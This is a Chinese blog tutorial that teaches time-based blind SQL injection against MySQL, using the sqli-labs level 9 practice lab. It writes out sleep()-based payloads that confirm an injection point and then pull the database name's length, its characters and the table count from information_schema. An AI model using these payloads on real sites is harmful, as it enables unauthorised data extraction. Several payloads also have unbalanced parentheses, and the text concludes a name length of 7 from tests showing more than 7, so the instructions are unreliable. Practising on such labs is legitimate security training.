百度360必应搜狗淘宝本站头条
mysql distinctjenkins官网mysql 子查询vba splitpython list sort
当前位置:网站首页 > IT技术 > 正文

黑客小白的进阶之路——SQL注入之MySQL时间注入

wptr33 2025-06-28 17:12 8 浏览

MySQL时间盲注

课前小问题

如果说uniom注入用不了,布尔盲注也用不了,无论你插入到什么样的sql语句,它的页面都没有反应,这个时候该怎么办呢?

这个时候我们就可以去用到时间盲注了。

那什么是时间盲注呢?

时间盲注:当布尔型注入没有结果(页面显示正常)的时候,我们很难去判断注入的代码是否被执行,也可以说到底这个注入点存不存在,这个时候布尔型注入就无法发挥自己的作用,基于时间的盲注就出现了,所谓基于时间的盲注,就是根据web页面响应的时间差来判断该页面是否存在sql注入点。

使用场景

1.union注入用不了,布尔注入也用不了。

演示:sqli-labs 靶场第9关

这里一直没反应,那我们这个时候就要用时间盲注了

时间盲注操作方式

A.先去判断是否存在注入

B.在去判断注入类型:字符型/数字型/搜索型。

Sleep函数,我们怎么通过sleep函数来判断呢?既然它是一个时间盲注会根据这个页面的一个时间差来去判断。


延迟5秒响应,因为and左边要满足右边也要满足,那么我们就去执行一把,存在注入,必然这也响应5秒,如果不响应慢5秒的话,那么它就不可能存在注入。

C.判断能使用的注入方式,这里不能使用union注入\布尔盲注

?id=1'and 1=1 %23  页面会显正常
?id=1'and 1=2 %23  页面会显示不正常?id=1'and sleep(5)%23发现页面延迟了5秒钟响应证明sleep被带入数据库做了查询。所以是存在时间盲注的。 

D.首先获取数据库名称的长度

?id=1'and if ((length(database())>7)),sleep(5),1)%23 延时5秒
?id=1'and if ((length(database())>8)),sleep(5),1)%23 不延时5秒


说明数据库名称长度为7位

E.获取数据库的名称

?id=1'and if ((ascii(substr(database(),1,1))>n),sleep(5),1)%23

大于114,不大于115,说明当前使用的数据库名称第一位的ascii值为115,所以查看ASCII表得为字符s

F.获取表数量

?id=1'and if ((select count(*)from information_schema.tables where table_schema=database())>4,sleep(5),1)--+延迟5秒

?id=1'and if ((select count(*)from information_schema.tables where table_schema=database())>5,sleep(5),1)--+不延迟5秒

G.获取后面替换expr1就行了,依次寻找名字、字段...

相关推荐

一篇文章带你了解PHP的学习使用(php的教程)

ThinkPHP5实战...

在memcached管理php的session(memcached libevent)

PHP的session(会话管理)一般是以文件形式进行,而在多个Web服务器之间进行session管理时memecached会比文件管理方式更加方便。在这里介绍如何使用memcached管理PHP的s...

php传值和传引用的区别(php 传值和传引用)

php传值:在函数范围内,改变变量值得大小,都不会影响到函数外边的变量值。PHP传引用:在函数范围内,对值的任何改变,在函数外部也有所体现,因为传引用传的是内存地址。传值:和copy是一样的。【打个比...

PHP 常量详解教程(php常量和变量)

常量类似变量,但是常量一旦被定义就无法更改或撤销定义。PHP常量常量是单个值的标识符(名称)。在脚本中无法改变该值。有效的常量名以字符或下划线开头(常量名称前面没有$符号)。注释:与变量不同,常...

php自学零基础入门小知识(php新手入门教程)

我们就把PHP入门当成一个苹果吧!一口一口的吃掉他!不啰嗦了!开始了1、嵌入方法:类似ASP的<%,PHP可以是<?php或者是<?,结束符号是?>,当然您也可以自己指定。2、...

PHP 语法详解(php语法大全)

PHP脚本在服务器上执行,然后向浏览器发送回纯HTML结果。基础PHP语法PHP脚本可放置于文档中的任何位置。PHP脚本以<?php开头,以?>结尾:<?php...

PHP笔记(一)PHP基础知识(php必背知识点)

创建PHP程序PHP代码框架<?php>2.文件命名规则...

PHP 8新特性之Attributes(注解),你掌握了吗?

PHP8的Alpha版本,过几天就要发布了,其中包含了不少的新特性,当然我自己认为最重要的还是JIT,这个我从2013年开始参与,中间挫折无数,失败无数后,终于要发布的东东。不过,今天呢,我不打算谈J...

PHP基本语法之标记与注释(php注释规范)

1、标记由于PHP是嵌入式脚本语言,它在实际开发中经常会与HTML内容混在一起,所以为了区分HTML与PHP代码,需要使用标记对PHP代码进行标识。如:<html>...

php注解(PHP注解 性能)

目标了解和使用php注解,如果你已经掌握其他一种具有注解的语言,例如:java、python等,你在本文中只需要了解点语法就行。示例php8以前的版本,注解写在注释里,如果你掌握其他语言的注解,你是不...

数据丢失?别慌!MySQL备份恢复攻略

想象一下,某个晴朗的午后,你正享受着咖啡,突然接到紧急电话:你的网站或APP彻底挂了!系统崩溃,界面全白。虽然心头一紧,但你或许还能安慰自己:系统崩溃只是暂停服务,数据还在,修复修复就好了。然而,如果...

MySQL 日志:undo log、redo log、binlog

今天来和大家分享MySQL的三个日志文件,可以说MySQL的多数特性都是围绕日志文件实现,而其中最重要的有以下三种:...

MySQL三大日志:binlog、redolog、undolog全解析

binlog概述在MySQL数据库中,binlog可是个相当重要的存在,它的全称为binarylog,也就是二进制日志。它就像是数据库的“记忆本”,记录了所有的DDL(数据定义语言)和...

1、MySQL数据库介绍(mysql数据库简单介绍)

1.1数据库的核心定义数据库的本质数据库乃存储数据对象之容器,涵盖如下关键组件:表(Table)...

MySQL 日志双雄:实时监控与历史归档实战优化

MySQL日志双雄:实时监控+历史归档实战用这招让你家日志系统再也不卡不爆炸MySQL十亿级日志处理:从洪峰到归档全攻略手把手教你用MySQL搞定ELK级日志监控在微服务架构大行其道的今天,日志系统早...

一周热门
最近发表
标签列表
Copyright Your WebSite.Some Rights Reserved.